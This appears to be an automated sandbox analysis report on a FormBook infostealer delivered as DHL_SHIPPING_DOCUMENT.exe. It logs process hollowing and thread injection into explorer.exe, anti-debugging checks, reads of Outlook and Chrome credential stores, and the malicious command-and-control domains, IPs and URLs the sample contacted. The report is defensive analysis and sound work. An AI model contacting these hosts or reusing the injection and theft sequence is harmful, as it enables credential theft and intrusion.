Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AF8D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h] 3_2_00AAA537
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h] 3_2_00A63D43
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h] 3_2_00AA3540
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h] 3_2_00A47D50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h] 3_2_00AA46A7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h] 3_2_00ABFE87
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h] 3_2_00A376E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A516E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A68EC7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h] 3_2_00A536CC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00ADFEC0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8ED6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h] 3_2_00A2E620
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h] 3_2_00ADFE3F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h] 3_2_00A58E00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h] 3_2_00AE1608
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h] 3_2_00A5A61C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h] 3_2_00A5A61C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h] 3_2_00A3766D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h] 3_2_00AEAE44
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h] 3_2_00AEAE44
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h] 3_2_00A38794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h] 3_2_00A637F5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h] 3_2_00A24F2E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h] 3_2_00A24F2E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h] 3_2_00A5E730
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h] 3_2_00AF070D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h] 3_2_00AF070D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h] 3_2_00A5A70E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h] 3_2_00A5A70E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h] 3_2_00A4F716
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h] 3_2_00ABFF10
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h] 3_2_00ABFF10
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF60
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AF8F6A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A3EF40
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040CEC3 LdrLoadDll, 3_2_0040CEC3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004018F8 SetUnhandledExceptionFilter, 1_2_004018F8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BF3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401796

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 50.87.195.203 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 37.97.254.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.getpay.life
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.luxgudonu.store
Source: C:\Windows\explorer.exe Domain query: www.motherhoodinthegarden.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.32 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.28.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sowmedia.site
Source: C:\Windows\explorer.exe Domain query: www.363ww.top
Source: C:\Windows\explorer.exe Domain query: www.espisys-technology.com
Source: C:\Windows\explorer.exe Domain query: www.on-smooth.com
Source: C:\Windows\explorer.exe Domain query: www.yh78898.com
Source: C:\Windows\explorer.exe Domain query: www.versicherungsgott.com
Source: C:\Windows\explorer.exe Network Connect: 104.233.254.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.88 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 113.52.135.193 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 3B0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3528 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Jump to behavior
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.333026756.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.580769030.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.324681730.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401A05 cpuid 1_2_00401A05
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040167D
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 830431 Sample: DHL_SHIPPING_DOCUMENT.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 DHL_SHIPPING_DOCUMENT.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\...\eixfhzlwqd.exe, PE32 9->27 dropped 12 eixfhzlwqd.exe 1 9->12         started        process5 signatures6 53 Detected unpacking (changes PE section rights) 12->53 55 Maps a DLL or memory area into another process 12->55 15 eixfhzlwqd.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 20 explorer.exe 3 1 15->20 injected process9 dnsIp10 29 motherhoodinthegarden.com 50.87.195.203, 49696, 49697, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 luxgudonu.store 46.23.69.44, 49704, 49705, 80 UK2NET-ASGB United Kingdom 20->31 33 12 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 help.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
50.87.195.203
 motherhoodinthegarden.com United States
46606 UNIFIEDLAYER-AS-1US true
37.97.254.29
 sowmedia.site Netherlands
20857 TRANSIP-ASAmsterdamtheNetherlandsNL true
46.23.69.44
 luxgudonu.store United Kingdom
13213 UK2NET-ASGB true
217.160.0.32
 www.espisys-technology.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
104.233.254.113
 www.yh78898.com United States
137443 ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK true
199.192.28.110
 www.getpay.life United States
22612 NAMECHEAP-NETUS true
81.169.145.88
 versicherungsgott.com Germany
6724 STRATOSTRATOAGDE true
113.52.135.193
 on-smooth.com Hong Kong
133380 LAYER-ASLayerstackLimitedHK true

Contacted Domains

Name IP Active
www.363ww.top 39.109.117.109 true
www.getpay.life 199.192.28.110 true
www.espisys-technology.com 217.160.0.32 true
sowmedia.site 37.97.254.29 true
versicherungsgott.com 81.169.145.88 true
motherhoodinthegarden.com 50.87.195.203 true
www.yh78898.com 104.233.254.113 true
luxgudonu.store 46.23.69.44 true
on-smooth.com 113.52.135.193 true
www.luxgudonu.store unknown unknown
www.on-smooth.com unknown unknown
www.motherhoodinthegarden.com unknown unknown
www.versicherungsgott.com unknown unknown
www.sowmedia.site unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== true
  • Avira URL Cloud: malware
 unknown
http://www.on-smooth.com/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== true
  • Avira URL Cloud: malware
 unknown
http://www.luxgudonu.store/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.sowmedia.site/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ true
  • Avira URL Cloud: malware
 unknown
http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ true
  • Avira URL Cloud: malware
 unknown
http://www.espisys-technology.com/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ true
  • Avira URL Cloud: malware
 unknown
http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ true
  • Avira URL Cloud: malware
 unknown
http://www.motherhoodinthegarden.com/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.yh78898.com/d2a3/ true
  • Avira URL Cloud: malware
 unknown
http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== true
  • Avira URL Cloud: malware
 unknown
http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== true
  • Avira URL Cloud: malware
 unknown
http://www.getpay.life/d2a3/ true
  • Avira URL Cloud: malware
 unknown